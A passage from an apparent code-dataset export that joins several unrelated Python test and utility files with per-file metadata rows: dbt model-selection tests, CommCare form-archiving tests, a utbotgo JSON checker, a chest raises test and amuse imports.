def test__postgres__tags(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--selector', 'bi_selector'])
self.assertEqual(len(results), 2)
created_models = self.get_models_in_schema()
self.assertFalse('alternative.users' in created_models)
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assertTrue('users' in created_models)
self.assertTrue('users_rollup' in created_models)
self.assert_correct_schemas()
self.assertTrue(os.path.exists('./target/manifest.json'))
with open('./target/manifest.json') as fp:
manifest = json.load(fp)
self.assertTrue('selectors' in manifest)
@use_profile('postgres')
def test__postgres__tags_and_children(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', 'tag:base+'])
self.assertEqual(len(results), 5)
created_models = self.get_models_in_schema()
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assertIn('emails_alt', created_models)
self.assertTrue('users_rollup' in created_models)
self.assertTrue('users' in created_models)
self.assertTrue('alternative.users' in created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__tags_and_children_limited(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', 'tag:base+2'])
self.assertEqual(len(results), 4)
created_models = self.get_models_in_schema()
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assertIn('emails_alt', created_models)
self.assertIn('users_rollup', created_models)
self.assertIn('users', created_models)
self.assertIn('alternative.users', created_models)
self.assertNotIn('users_rollup_dependency', created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_and_children(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', 'users+'])
self.assertEqual(len(results), 4)
self.assertTablesEqual("seed", "users")
self.assertTablesEqual("summary_expected", "users_rollup")
created_models = self.get_models_in_schema()
self.assertIn('emails_alt', created_models)
self.assertNotIn('base_users', created_models)
self.assertNotIn('alternative.users', created_models)
self.assertNotIn('emails', created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_and_children_limited(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', 'users+1'])
self.assertEqual(len(results), 3)
self.assertTablesEqual("seed", "users")
self.assertTablesEqual("summary_expected", "users_rollup")
created_models = self.get_models_in_schema()
self.assertIn('emails_alt', created_models)
self.assertNotIn('base_users', created_models)
self.assertNotIn('emails', created_models)
self.assertNotIn('users_rollup_dependency', created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_and_parents(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', '+users_rollup'])
self.assertEqual(len(results), 2)
self.assertTablesEqual("seed", "users")
self.assertTablesEqual("summary_expected", "users_rollup")
created_models = self.get_models_in_schema()
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_and_parents_limited(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', '1+users_rollup'])
self.assertEqual(len(results), 2)
self.assertTablesEqual("seed", "users")
self.assertTablesEqual("summary_expected", "users_rollup")
created_models = self.get_models_in_schema()
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_with_exclusion(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(
['run', '--select', '+users_rollup', '--exclude', 'models/users_rollup.sql']
)
self.assertEqual(len(results), 1)
self.assertTablesEqual("seed", "users")
created_models = self.get_models_in_schema()
self.assertFalse('base_users' in created_models)
self.assertFalse('users_rollup' in created_models)
self.assertFalse('emails' in created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__locally_qualified_name(self):
results = self.run_dbt(['run', '--select', 'test.subdir'])
self.assertEqual(len(results), 2)
created_models = self.get_models_in_schema()
self.assertNotIn('users_rollup', created_models)
self.assertNotIn('base_users', created_models)
self.assertNotIn('emails', created_models)
self.assertIn('subdir', created_models)
self.assertIn('nested_users', created_models)
self.assert_correct_schemas()
results = self.run_dbt(['run', '--select', 'models/test/subdir*'])
self.assertEqual(len(results), 2)
created_models = self.get_models_in_schema()
self.assertNotIn('users_rollup', created_models)
self.assertNotIn('base_users', created_models)
self.assertNotIn('emails', created_models)
self.assertIn('subdir', created_models)
self.assertIn('nested_users', created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__locally_qualified_name_model_with_dots(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', 'alternative.users'])
self.assertEqual(len(results), 1)
created_models = self.get_models_in_schema()
self.assertIn('alternative.users', created_models)
self.assert_correct_schemas()
results = self.run_dbt(['run', '--select', 'models/alternative.*'])
self.assertEqual(len(results), 1)
created_models = self.get_models_in_schema()
self.assertIn('alternative.users', created_models)
self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__childrens_parents(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', '@base_users'])
self.assertEqual(len(results), 5)
created_models = self.get_models_in_schema()
self.assertIn('users_rollup', created_models)
self.assertIn('users', created_models)
self.assertIn('emails_alt', created_models)
self.assertIn('alternative.users', created_models)
self.assertNotIn('subdir', created_models)
self.assertNotIn('nested_users', created_models)
results = self.run_dbt(
['test', '--select', 'test_name:not_null'],
)
self.assertEqual(len(results), 1)
assert results[0].node.name == 'not_null_emails_email'
@use_profile('postgres')
def test__postgres__more_childrens_parents(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', '@users'])
# users, emails_alt, users_rollup, users_rollup_dependency, but not base_users (ephemeral)
self.assertEqual(len(results), 4)
created_models = self.get_models_in_schema()
self.assertIn('users_rollup', created_models)
self.assertIn('users', created_models)
self.assertIn('emails_alt', created_models)
self.assertNotIn('subdir', created_models)
self.assertNotIn('nested_users', created_models)
results = self.run_dbt(
['test', '--select', 'test_name:unique'],
)
self.assertEqual(len(results), 2)
assert sorted([r.node.name for r in results]) == ['unique_users_id', 'unique_users_rollup_gender']
@use_profile('postgres')
def test__postgres__concat(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', '@emails_alt', 'users_rollup'])
# users, emails_alt, users_rollup
self.assertEqual(len(results), 3)
created_models = self.get_models_in_schema()
self.assertIn('users_rollup', created_models)
self.assertIn('users', created_models)
self.assertIn('emails_alt', created_models)
self.assertNotIn('subdir', created_models)
self.assertNotIn('nested_users', created_models)
@use_profile('postgres')
def test__postgres__concat_exclude(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', '@emails_alt', 'users_rollup', '--exclude', 'emails_alt'])
# users, users_rollup
self.assertEqual(len(results), 2)
created_models = self.get_models_in_schema()
self.assertIn('users', created_models)
self.assertIn('users_rollup', created_models)
self.assertNotIn('emails_alt', created_models)
self.assertNotIn('subdir', created_models)
self.assertNotIn('nested_users', created_models)
@use_profile('postgres')
def test__postgres__concat_exclude_concat(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(
['run', '--select', '@emails_alt', 'users_rollup', '--exclude', 'emails_alt', 'users_rollup']
)
# users
self.assertEqual(len(results), 1)
created_models = self.get_models_in_schema()
self.assertIn('users', created_models)
self.assertNotIn('emails_alt', created_models)
self.assertNotIn('users_rollup', created_models)
self.assertNotIn('subdir', created_models)
self.assertNotIn('nested_users', created_models)
results = self.run_dbt(
['test', '--select', '@emails_alt', 'users_rollup', '--exclude', 'emails_alt', 'users_rollup']
)
self.assertEqual(len(results), 1)
assert results[0].node.name == 'unique_users_id'
@use_profile('postgres')
def test__postgres__exposure_parents(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['ls', '--select', '+exposure:seed_ml_exposure'])
assert len(results) == 2
assert sorted(results) == ['exposure:test.seed_ml_exposure', 'source:test.raw.seed']
results = self.run_dbt(['ls', '--select', '1+exposure:user_exposure'])
assert len(results) == 5
assert sorted(results) == ['exposure:test.user_exposure', 'test.unique_users_id',
'test.unique_users_rollup_gender', 'test.users', 'test.users_rollup']
results = self.run_dbt(['run', '-m', '+exposure:user_exposure'])
# users, users_rollup
assert len(results) == 2
created_models = self.get_models_in_schema()
self.assertIn('users_rollup', created_models)
self.assertIn('users', created_models)
self.assertNotIn('emails_alt', created_models)
self.assertNotIn('subdir', created_models)
self.assertNotIn('nested_users', created_models)
| 39.239766
| 109
| 0.659091
| 1,536
| 13,420
| 5.440755
| 0.080078
| 0.154003
| 0.189183
| 0.090463
| 0.871246
| 0.847433
| 0.829245
| 0.821587
| 0.809381
| 0.780902
| 0
| 0.003132
| 0.214829
| 13,420
| 341
| 110
| 39.354839
| 0.789978
| 0.01237
| 0
| 0.686131
| 0
| 0
| 0.188406
| 0.026117
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.076642
| false
| 0
| 0.014599
| 0.010949
| 0.105839
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81268bca06f50866dc190d7942f94c0a14a27b55
| 19,762
|
py
|
Python
|
corehq/ex-submodules/couchforms/tests/test_archive.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 1
|
2020-07-14T13:00:23.000Z
|
2020-07-14T13:00:23.000Z
|
corehq/ex-submodules/couchforms/tests/test_archive.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 94
|
2020-12-11T06:57:31.000Z
|
2022-03-15T10:24:06.000Z
|
corehq/ex-submodules/couchforms/tests/test_archive.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import mock
from datetime import datetime, timedelta
from django.test import TestCase
from django.test.utils import override_settings
from corehq.form_processor.tasks import reprocess_archive_stubs
from corehq.apps.change_feed import topics
from corehq.apps.receiverwrapper.util import submit_form_locally
from corehq.form_processor.interfaces.dbaccessors import CaseAccessors, FormAccessors
from corehq.util.context_managers import drop_connected_signals
from couchforms.signals import xform_archived, xform_unarchived
from corehq.form_processor.tests.utils import FormProcessorTestUtils, use_sql_backend
from corehq.util.test_utils import TestFileMixin
from couchforms.models import UnfinishedArchiveStub
from testapps.test_pillowtop.utils import capture_kafka_changes_context
class TestFormArchiving(TestCase, TestFileMixin):
file_path = ('data', 'sample_xforms')
root = os.path.dirname(__file__)
def setUp(self):
super(TestFormArchiving, self).setUp()
self.casedb = CaseAccessors('test-domain')
self.formdb = FormAccessors('test-domain')
def tearDown(self):
FormProcessorTestUtils.delete_all_xforms()
FormProcessorTestUtils.delete_all_cases()
super(TestFormArchiving, self).tearDown()
def testArchive(self):
case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
xform = result.xform
self.assertTrue(xform.is_normal)
self.assertEqual(0, len(xform.history))
lower_bound = datetime.utcnow() - timedelta(seconds=1)
xform.archive(user_id='mr. librarian')
upper_bound = datetime.utcnow() + timedelta(seconds=1)
xform = self.formdb.get_form(xform.form_id)
self.assertTrue(xform.is_archived)
case = self.casedb.get_case(case_id)
self.assertTrue(case.is_deleted)
self.assertEqual(case.xform_ids, [])
[archival] = xform.history
self.assertTrue(lower_bound <= archival.date <= upper_bound)
self.assertEqual('archive', archival.operation)
self.assertEqual('mr. librarian', archival.user)
lower_bound = datetime.utcnow() - timedelta(seconds=1)
xform.unarchive(user_id='mr. researcher')
upper_bound = datetime.utcnow() + timedelta(seconds=1)
xform = self.formdb.get_form(xform.form_id)
self.assertTrue(xform.is_normal)
case = self.casedb.get_case(case_id)
self.assertFalse(case.is_deleted)
self.assertEqual(case.xform_ids, [xform.form_id])
[archival, restoration] = xform.history
self.assertTrue(lower_bound <= restoration.date <= upper_bound)
self.assertEqual('unarchive', restoration.operation)
self.assertEqual('mr. researcher', restoration.user)
def testUnfinishedArchiveStub(self):
# Test running the celery task reprocess_archive_stubs on an existing archive stub
case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
xform = result.xform
self.assertTrue(xform.is_normal)
self.assertEqual(0, len(xform.history))
# Mock the archive function throwing an error
with mock.patch('couchforms.signals.xform_archived.send') as mock_send:
try:
mock_send.side_effect = Exception
xform.archive(user_id='librarian')
except Exception:
pass
# Get the form with the updated history, it should be archived
xform = self.formdb.get_form(xform.form_id)
self.assertEqual(1, len(xform.history))
self.assertTrue(xform.is_archived)
[archival] = xform.history
self.assertEqual('archive', archival.operation)
self.assertEqual('librarian', archival.user)
# The case associated with the form should still exist, it was not rebuilt because of the exception
case = self.casedb.get_case(case_id)
self.assertFalse(case.is_deleted)
# There should be a stub for the unfinished archive
unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs), 1)
self.assertEqual(unfinished_archive_stubs[0].history_updated, True)
self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
self.assertEqual(unfinished_archive_stubs[0].archive, True)
# Manually call the periodic celery task that reruns archiving/unarchiving actions
reprocess_archive_stubs()
# The case and stub should both be deleted now
case = self.casedb.get_case(case_id)
self.assertTrue(case.is_deleted)
unfinished_archive_stubs_after_reprocessing = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs_after_reprocessing), 0)
def testUnfinishedUnarchiveStub(self):
# Test running the celery task reprocess_archive_stubs on an existing unarchive stub
case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
xform = result.xform
self.assertTrue(xform.is_normal)
self.assertEqual(0, len(xform.history))
# Archive the form successfully
xform.archive(user_id='librarian')
# Mock the unarchive function throwing an error
with mock.patch('couchforms.signals.xform_unarchived.send') as mock_send:
try:
mock_send.side_effect = Exception
xform.unarchive(user_id='librarian')
except Exception:
pass
# Make sure the history only has an archive and an unarchive
xform = self.formdb.get_form(xform.form_id)
self.assertEqual(2, len(xform.history))
self.assertFalse(xform.is_archived)
self.assertEqual('archive', xform.history[0].operation)
self.assertEqual('librarian', xform.history[0].user)
self.assertEqual('unarchive', xform.history[1].operation)
self.assertEqual('librarian', xform.history[1].user)
# The case should not exist because the unarchived form was not rebuilt
case = self.casedb.get_case(case_id)
self.assertTrue(case.is_deleted)
# There should be a stub for the unfinished unarchive
unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs), 1)
self.assertEqual(unfinished_archive_stubs[0].history_updated, True)
self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
self.assertEqual(unfinished_archive_stubs[0].archive, False)
# Manually call the periodic celery task that reruns archiving/unarchiving actions
reprocess_archive_stubs()
# The case should be back, and the stub should be deleted now
case = self.casedb.get_case(case_id)
self.assertFalse(case.is_deleted)
unfinished_archive_stubs_after_reprocessing = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs_after_reprocessing), 0)
def testUnarchivingWithArchiveStub(self):
# Test a user-initiated unarchive with an existing archive stub
case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
xform = result.xform
self.assertTrue(xform.is_normal)
self.assertEqual(0, len(xform.history))
# Mock the archive function throwing an error
with mock.patch('couchforms.signals.xform_archived.send') as mock_send:
try:
mock_send.side_effect = Exception
xform.archive(user_id='librarian')
except Exception:
pass
# There should be a stub for the unfinished archive
unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs), 1)
self.assertEqual(unfinished_archive_stubs[0].history_updated, True)
self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
self.assertEqual(unfinished_archive_stubs[0].archive, True)
# Call an unarchive
xform.unarchive(user_id='librarian')
# The unfinished archive stub should be deleted
unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs), 0)
# The case should exist because the case close was unarchived
case = self.casedb.get_case(case_id)
self.assertFalse(case.is_deleted)
# Manually call the periodic celery task that reruns archiving/unarchiving actions
reprocess_archive_stubs()
# Make sure the case still exists (to double check that the archive stub was deleted)
case = self.casedb.get_case(case_id)
self.assertFalse(case.is_deleted)
def testArchivingWithUnarchiveStub(self):
# Test a user-initiated archive with an existing unarchive stub
case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
xform = result.xform
self.assertTrue(xform.is_normal)
self.assertEqual(0, len(xform.history))
# Archive the form successfully
xform.archive(user_id='librarian')
# Mock the unarchive function throwing an error
with mock.patch('couchforms.signals.xform_unarchived.send') as mock_send:
try:
mock_send.side_effect = Exception
xform.unarchive(user_id='librarian')
except Exception:
pass
# There should be a stub for the unfinished unarchive
unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs), 1)
self.assertEqual(unfinished_archive_stubs[0].history_updated, True)
self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
self.assertEqual(unfinished_archive_stubs[0].archive, False)
# Call an archive
xform.archive(user_id='librarian')
# The unfinished archive stub should be deleted
unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs), 0)
# The case should not exist because the case close was archived
case = self.casedb.get_case(case_id)
self.assertTrue(case.is_deleted)
# Manually call the periodic celery task that reruns archiving/unarchiving actions
reprocess_archive_stubs()
# The history should not have been added to, make sure that it still only has one entry
# Make sure the case still does not exist (to double check that the unarchive stub was deleted)
case = self.casedb.get_case(case_id)
self.assertTrue(case.is_deleted)
def testUnfinishedArchiveStubErrorAddingHistory(self):
# Test running the celery task reprocess_archive_stubs on an existing archive stub where the archive
# initially failed on updating the history
case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
xform = result.xform
self.assertTrue(xform.is_normal)
self.assertEqual(0, len(xform.history))
# Mock the couch and sql archive function throwing an error (so that this test works for both)
tmp = 'corehq.form_processor.backends.%s.dbaccessors.%s'
with mock.patch(tmp % ('sql', 'FormAccessorSQL.set_archived_state')) as mock_operation_sql:
with mock.patch(tmp % ('couch', 'XFormOperation')) as mock_operation_couch:
try:
mock_operation_sql.side_effect = Exception
mock_operation_couch.side_effect = Exception
xform.archive(user_id='librarian')
except Exception:
pass
# Get the form with the updated history, make sure it has not been archived yet
xform = self.formdb.get_form(xform.form_id)
self.assertEqual(0, len(xform.history))
self.assertFalse(xform.is_archived)
# The case associated with the form should still exist, it was not rebuilt because of the exception
case = self.casedb.get_case(case_id)
self.assertFalse(case.is_deleted)
# There should be a stub for the unfinished archive, and the history should not be updated yet
unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs), 1)
self.assertEqual(unfinished_archive_stubs[0].history_updated, False)
self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
self.assertEqual(unfinished_archive_stubs[0].archive, True)
# Manually call the periodic celery task that reruns archiving/unarchiving actions
reprocess_archive_stubs()
# Make sure the history shows an archive now
xform = self.formdb.get_form(xform.form_id)
self.assertEqual(1, len(xform.history))
self.assertTrue(xform.is_archived)
[archival] = xform.history
self.assertEqual('archive', archival.operation)
self.assertEqual('librarian', archival.user)
# The case and stub should both be deleted now
case = self.casedb.get_case(case_id)
self.assertTrue(case.is_deleted)
unfinished_archive_stubs_after_reprocessing = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs_after_reprocessing), 0)
def testUnfinishedUnarchiveStubErrorAddingHistory(self):
# Test running the celery task reprocess_archive_stubs on an existing archive stub where the archive
# initially failed on updating the history
case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
xform = result.xform
self.assertTrue(xform.is_normal)
self.assertEqual(0, len(xform.history))
# Archive the form successfully
xform.archive(user_id='librarian')
# Mock the couch and sql archive function throwing an error (so that this test works for both)
tmp = 'corehq.form_processor.backends.%s.dbaccessors.%s'
with mock.patch(tmp % ('sql', 'FormAccessorSQL.set_archived_state')) as mock_operation_sql:
with mock.patch(tmp % ('couch', 'XFormOperation')) as mock_operation_couch:
try:
mock_operation_sql.side_effect = Exception
mock_operation_couch.side_effect = Exception
xform.unarchive(user_id='librarian')
except Exception:
pass
# Get the form with the updated history, make sure it only has one entry (the archive)
xform = self.formdb.get_form(xform.form_id)
self.assertEqual(1, len(xform.history))
self.assertTrue(xform.is_archived)
[archival] = xform.history
self.assertEqual('archive', archival.operation)
self.assertEqual('librarian', archival.user)
# The case associated with the form should not exist, it was not rebuilt because of the exception
case = self.casedb.get_case(case_id)
self.assertTrue(case.is_deleted)
# There should be a stub for the unfinished archive, and the history should not be updated yet
unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs), 1)
self.assertEqual(unfinished_archive_stubs[0].history_updated, False)
self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
self.assertEqual(unfinished_archive_stubs[0].archive, False)
# Manually call the periodic celery task that reruns archiving/unarchiving actions
reprocess_archive_stubs()
# Make sure the history shows an archive and an unarchive now
xform = self.formdb.get_form(xform.form_id)
self.assertEqual(2, len(xform.history))
self.assertFalse(xform.is_archived)
self.assertEqual('archive', xform.history[0].operation)
self.assertEqual('librarian', xform.history[0].user)
self.assertEqual('unarchive', xform.history[1].operation)
self.assertEqual('librarian', xform.history[1].user)
# The case should be back, and the stub should be deleted now
case = self.casedb.get_case(case_id)
self.assertFalse(case.is_deleted)
unfinished_archive_stubs_after_reprocessing = UnfinishedArchiveStub.objects.filter()
self.assertEqual(len(unfinished_archive_stubs_after_reprocessing), 0)
def testSignal(self):
global archive_counter, restore_counter
archive_counter = 0
restore_counter = 0
def count_archive(**kwargs):
global archive_counter
archive_counter += 1
def count_unarchive(**kwargs):
global restore_counter
restore_counter += 1
xform_archived.connect(count_archive)
xform_unarchived.connect(count_unarchive)
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
self.assertEqual(0, archive_counter)
self.assertEqual(0, restore_counter)
result.xform.archive()
self.assertEqual(1, archive_counter)
self.assertEqual(0, restore_counter)
xform = self.formdb.get_form(result.xform.form_id)
xform.unarchive()
self.assertEqual(1, archive_counter)
self.assertEqual(1, restore_counter)
@use_sql_backend
class TestFormArchivingSQL(TestFormArchiving):
@override_settings(TESTS_SHOULD_USE_SQL_BACKEND=True)
def testPublishChanges(self):
xml_data = self.get_xml('basic')
result = submit_form_locally(
xml_data,
'test-domain',
)
xform = result.xform
with capture_kafka_changes_context(topics.FORM_SQL) as change_context:
with drop_connected_signals(xform_archived):
xform.archive()
self.assertEqual(1, len(change_context.changes))
self.assertEqual(change_context.changes[0].id, xform.form_id)
xform = self.formdb.get_form(xform.form_id)
with capture_kafka_changes_context(topics.FORM_SQL) as change_context:
with drop_connected_signals(xform_unarchived):
xform.unarchive()
self.assertEqual(1, len(change_context.changes))
self.assertEqual(change_context.changes[0].id, xform.form_id)
| 43.432967
| 108
| 0.683787
| 2,330
| 19,762
| 5.619742
| 0.092275
| 0.090499
| 0.080648
| 0.04567
| 0.834733
| 0.811899
| 0.803345
| 0.785092
| 0.767985
| 0.767985
| 0
| 0.012352
| 0.233934
| 19,762
| 454
| 109
| 43.528634
| 0.852566
| 0.170479
| 0
| 0.770642
| 0
| 0
| 0.073684
| 0.035006
| 0
| 0
| 0
| 0
| 0.336391
| 1
| 0.039755
| false
| 0.018349
| 0.045872
| 0
| 0.097859
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
812ecbfbc24c58f9fdc18df683d2da5b8ceee4df
| 729
|
py
|
Python
|
examples/test2/.test_checker.py
|
Software-Analysis-Team/UTBotGo
|
973a13d374896a68078a1bf139c73ca515822e99
|
[
"MIT"
] | 1
|
2021-12-03T00:32:58.000Z
|
2021-12-03T00:32:58.000Z
|
examples/test2/.test_checker.py
|
Software-Analysis-Team/UTBotGo
|
973a13d374896a68078a1bf139c73ca515822e99
|
[
"MIT"
] | 8
|
2021-10-30T14:24:54.000Z
|
2022-02-01T16:59:56.000Z
|
examples/test2/.test_checker.py
|
Software-Analysis-Team/UTBotGo
|
973a13d374896a68078a1bf139c73ca515822e99
|
[
"MIT"
] | 2
|
2021-09-18T10:23:26.000Z
|
2021-12-03T00:33:02.000Z
|
#!/usr/bin/env python3
import json
with open('utbotgo/functions/addInt/args.json', 'r') as f:
args = json.load(f)
assert len(args) == 1
arg = args[0]
assert list(arg.keys()) == ['x', 'y']
assert type(arg['x']) == int and type(arg['y']) == int
with open('utbotgo/functions/addInt/results.json', 'w') as f:
f.write(json.dumps([{'R': arg['x'] + arg['y']}]))
with open('utbotgo/functions/multInt/args.json', 'r') as f:
args = json.load(f)
assert len(args) == 1
arg = args[0]
assert list(arg.keys()) == ['x', 'y']
assert type(arg['x']) == int and type(arg['y']) == int
with open('utbotgo/functions/multInt/results.json', 'w') as f:
f.write(json.dumps([{'R': arg['x'] * arg['y']}]))
| 31.695652
| 62
| 0.576132
| 118
| 729
| 3.559322
| 0.279661
| 0.07619
| 0.142857
| 0.228571
| 0.938095
| 0.761905
| 0.761905
| 0.761905
| 0.761905
| 0.761905
| 0
| 0.008347
| 0.178326
| 729
| 22
| 63
| 33.136364
| 0.692821
| 0.028807
| 0
| 0.588235
| 0
| 0
| 0.229137
| 0.203678
| 0
| 0
| 0
| 0
| 0.352941
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
814373931c32b603535aaa21c8ae3be668251ede
| 146
|
py
|
Python
|
chest/tests/test_utils.py
|
s-t-e-v-e-n-k/chest
|
2e672418b1225f10f9cb8fd61594393c1a1d954e
|
[
"BSD-3-Clause"
] | 51
|
2015-08-30T19:13:29.000Z
|
2020-04-13T07:59:27.000Z
|
chest/tests/test_utils.py
|
s-t-e-v-e-n-k/chest
|
2e672418b1225f10f9cb8fd61594393c1a1d954e
|
[
"BSD-3-Clause"
] | 10
|
2015-08-21T17:25:45.000Z
|
2021-02-18T20:02:15.000Z
|
chest/tests/test_utils.py
|
s-t-e-v-e-n-k/chest
|
2e672418b1225f10f9cb8fd61594393c1a1d954e
|
[
"BSD-3-Clause"
] | 13
|
2015-01-14T18:57:40.000Z
|
2021-12-31T10:03:28.000Z
|
from chest.utils import raises
def test_raises():
assert raises(KeyError, lambda: {}[1])
assert not raises(KeyError, lambda: {1: 2}[1])
| 20.857143
| 50
| 0.678082
| 21
| 146
| 4.666667
| 0.619048
| 0.285714
| 0.408163
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.178082
| 146
| 6
| 51
| 24.333333
| 0.783333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d48c646f689aabc0f26c58f0df52338ea8118980
| 151
|
py
|
Python
|
src/amuse/ic/fractalcluster.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 131
|
2015-06-04T09:06:57.000Z
|
2022-02-01T12:11:29.000Z
|
src/amuse/ic/fractalcluster.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 690
|
2015-10-17T12:18:08.000Z
|
2022-03-31T16:15:58.000Z
|
src/amuse/ic/fractalcluster.py
|
rieder/amuse
|
3ac3b6b8f922643657279ddee5c8ab3fc0440d5e
|
[
"Apache-2.0"
] | 102
|
2015-01-22T10:00:29.000Z
|
2022-02-09T13:29:43.000Z
|
from amuse.community.fractalcluster.interface import MakeFractalCluster
from amuse.community.fractalcluster.interface import new_fractal_cluster_model
| 50.333333
| 78
| 0.907285
| 17
| 151
| 7.882353
